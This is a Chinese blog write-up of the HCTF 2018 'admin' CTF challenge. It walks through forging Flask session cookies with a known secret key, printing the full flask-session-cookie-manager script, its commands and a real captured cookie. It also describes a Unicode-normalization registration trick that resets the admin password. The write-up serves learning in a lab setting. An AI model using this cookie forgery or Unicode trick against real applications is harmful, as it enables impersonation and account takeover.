[HCTF 2018]admin(flask session伪造,Unicode欺骗)

最新推荐文章于 2023-11-19 12:56:09 发布
最新推荐文章于 2023-11-19 12:56:09 发布
阅读量2.6k 收藏 3
点赞数 1
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104594655
版权

先随便注册一个账号进去看看。

在index的源码处找到提示,you are not admin,估计是要用admin的身份登录才会有flag。
在这里插入图片描述
然后在change的源码找到了网站项目的github地址:
在这里插入图片描述

下载下来是一个flask项目,这里看了看wp知道要看路由route.py,然而我这种菜鸡是看不懂的。

有三种解题方法,不过看其他wp第三种都没有实现。

一,flask session伪造:

这里我知道了flask的session如果要加密或者解密需要一个SECRET_KEY

序列化session的主要过程:

1,json.dumps 将对象转换成json字符串,作为数据
2,如果数据压缩后长度更短,则用zlib库进行压缩
3,将数据用base64编码
4,通过hmac算法计算数据的签名,将签名附在数据后,用“.”分割

第4步就解决了用户篡改session的问题,因为在不知道secret_key的情况下,是无法伪造签名的。这道题的源码给出了secret_key,所以可以session伪造。

参考:https://www.leavesongs.com/PENETRATION/client-session-security.html

然后直接用脚本加解密:
地址:https://github.com/noraj/flask-session-cookie-manager

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

使用方法:

解密:python flask_session_manager.py decode -s SECRET_KEY -c session

加密:python flask_session_manager.py encode -s SECRET_KEY -t 未加密session

先抓登录成功界面的包,然后解密session:

python3 1.py decode -s ckj123 -c .eJw9kE9rwjAYxr_KeM8eurTCEDw4UkOF9w2VZCO5SLXVpjYOqlIb8buvk-HpOfzg-XeHzb6rzjXMLt21msDGlTC7w9sWZkC8bInnCQbdU_g6Wq5j45cO_cobpQOF0llVeqkWPXHriOU3E5Y18dZZoRmGdJAqTSjoqfEmlmJVU9hFKHCw6sCoMQOF2pNPI8n1DccM4_MeFUbIdWK9TpDvBmzS3qi2Rr6YSpXHttG9FYaZQK0V67FPNofHBHbnbr-5_Byr02sCsoxZnzGp2saMimHt7F9V_umR29qKLDZNOpCwtfxeOhqnUT5_2jlfHKqX09Z_sPyfnAo_AiiKAiZwPVfd8zV4j-DxC2jGbMw.XltvVw.hbTHaI6lG6Fn3uXRaeFlhoTtcCg

解密后的session如下:
{'_fresh': True, '_id': b'47e44835075dd57bab2bfa5377be7f90046b7d1c1a49bde6312918759bf78ba7740c2e8666278f6a485135dbd0134058fe8072210a9a009947f50df6c3eddb2b', 'csrf_token': b'3b6fb699cbb634bd6b40f06adb7b124fa9ab6bf5', 'image': b'no6A', 'name': 'aaa', 'user_id': '10'}

在这里插入图片描述
然后把name改为admin加密试试:
{’_fresh’: True, ‘_id’: b’47e44835075dd57bab2bfa5377be7f90046b7d1c1a49bde6312918759bf78ba7740c2e8666278f6a485135dbd0134058fe8072210a9a009947f50df6c3eddb2b’, ‘csrf_token’: b’3b6fb699cbb634bd6b40f06adb7b124fa9ab6bf5’, ‘image’: b’no6A’, ‘name’: ‘admin’, ‘user_id’: ‘10’}
但是试了很多次就是不行。。
在这里插入图片描述
二,Unicode欺骗

首先我们注册一个
ᴬᴰᴹᴵᴺ的账户,这时候我们传入的数据会进行一次转化,这时ᴬᴰmin–>ADmin,服务器端会判断该用户是否存在,然后成功注册
在这里插入图片描述
登陆该账号,因为登陆时也会被进行一次转化,所以使用ᴬᴰᴹᴵᴺ登陆,但后台的账号是ADmin

在这里插入图片描述
然后执行一次更改密码操作,改密码时也会进行一次转化,这时我们便从ADmin–>admin,完成了admin账户的密码更改操作,这时候再登陆admin账号,就可以得到flag了

在这里插入图片描述

天问_Herbert555
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flaskflask-session的具体使用
09-20
Flask框架中,session管理是一个重要的功能,它允许开发者在用户的不同请求之间保持状态。然而,Flask的默认实现仅使用签名cookie来保存session数据,这可能不满足所有需求。`flask-session`扩展提供了解决方案,...
flask session组件的使用示例
09-19
在Python的Web开发框架Flask中,Session是一个关键的组件,用于在用户的多次请求之间保持状态。本篇文章将深入探讨Flask内置的Session组件以及第三方的`flask-session`组件的使用方法和处理机制。 一、Flask 内置 ...
flask session伪造admin身份
since_2020的博客
08-09 4074
flask session 伪造 准备工作 需要先找是否有SECRET_KEY python脚本可以把flasksession解密出来,但是如果想要加密伪造生成自己的session的话,还需要知道flask用来签名的SECRET_KEY 假设当前的SECRET_KEY是 ckj123 安装缺少的module 注意: 第一次弄的时候没有很多module,会报这样类似的错 ImportError: No module named ‘itsdangerous’ 直接安装对应module pip ins
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7190
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
[HCTF 2018]admin (三种解法详细详解)
记录学习,一起进步
01-17 2436
[HCTF 2018]admin
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2895
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
[HCTF 2018]admin
Knsec
05-18 3115
[HCTF 2018]admin
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn ...
flasksession、cookie解加密脚本
10-13
在提供的`flask_session_cookie_manager3.py`和`flask_session_cookie_manager2.py`文件中,可能包含了实现这个过程的代码。这些脚本可能用来检查或调试`Flask`应用的`session`和`cookie`管理,或者用于演示如何手动...
基于Flask和Shell的pear_admin管理系统设计源码
最新发布
04-11
本源码提供了一个基于Flask和Shell的pear_admin管理系统设计。项目包含1194个文件,其中包括489个PNG图片、179个JavaScript文件、123个Python文件、90个CSS样式文件、81个HTML文件、77个GIF图片、38个SVG图像、24个...
浅谈flask中的session伪造
lukky_的博客
11-19 257
python3 脚本3.py decode -c "session值" -s "key值"python3 脚本3.py encode -s "key值" -t "我们需要伪造的值"flask中的session是存储在客户端的cookie中,flask仅对数据进行签名。flask通过一个secret_key 密钥对数据 进行签名来防止session被篡改。前提 得到session信息 并且 知道flask的签名的SECRET_KEY。知识点 flasksession伪造
[HCTF 2018]admin 1
feng的博客
10-20 6954
前言 这题的三种方法都是姿势盲区。。。。第三种方法只给个介绍。。因为好像复现的话不能成功,但是学习学习这种方法的思想。 姿势总结 flask session伪造 unicode欺骗 条件竞争 方法一:flask session伪造 我做题目的时候一直以为这题应该是SQL注入。。。在登录那里被卡了好久。。最后发现屁用都没有。。 首先!我们先注册一个再登录,在change password那里查看源码,可以看到有提示: 但是我并没有看到。。。这题也深深的教会了我,虽然页面可能有点多,源码还是要好好看看。。
Flasksession伪造
TenG的博客
05-22 3911
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 470
[HarekazeCTF2019]Easy Notes(session伪造)
Flask中的session伪造
m0_60716947的博客
10-18 1139
flasksession伪造
[HCTF 2018]adminunicode欺骗
weixin_52116519的博客
04-22 635
前言 今天这道题完全没接触过,算是学到两种新的解题方法,挺开心的。没有思路,只能按照大佬的wp来记录了。 1、注册admin,但是显示已注册,不能注册,感觉这里应该有大作用。 2、那就随便注册一个。看源码,说不是管理员。 3、又找了其他功能,没发现有啥。4、但是改密码的时候,发现一个链接。 5、访问 6、发现admin,但是密码加密了,没得用。 7、不会了,看wp吧。 解法一:unicode欺骗 1、参考文章 Unicode欺骗 2、nodeprep.prepare()漏洞原理 使用nodeprep.p
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1814
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
flask session
06-07
Flask sessionFlask 框架提供的一种机制,用于在不同请求之间存储和共享数据。它使用一个加密的 cookie 来存储数据,这样即使 cookie 被窃取,也无法读取其中的数据。通过 flask.session 对象可以轻松地设置和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值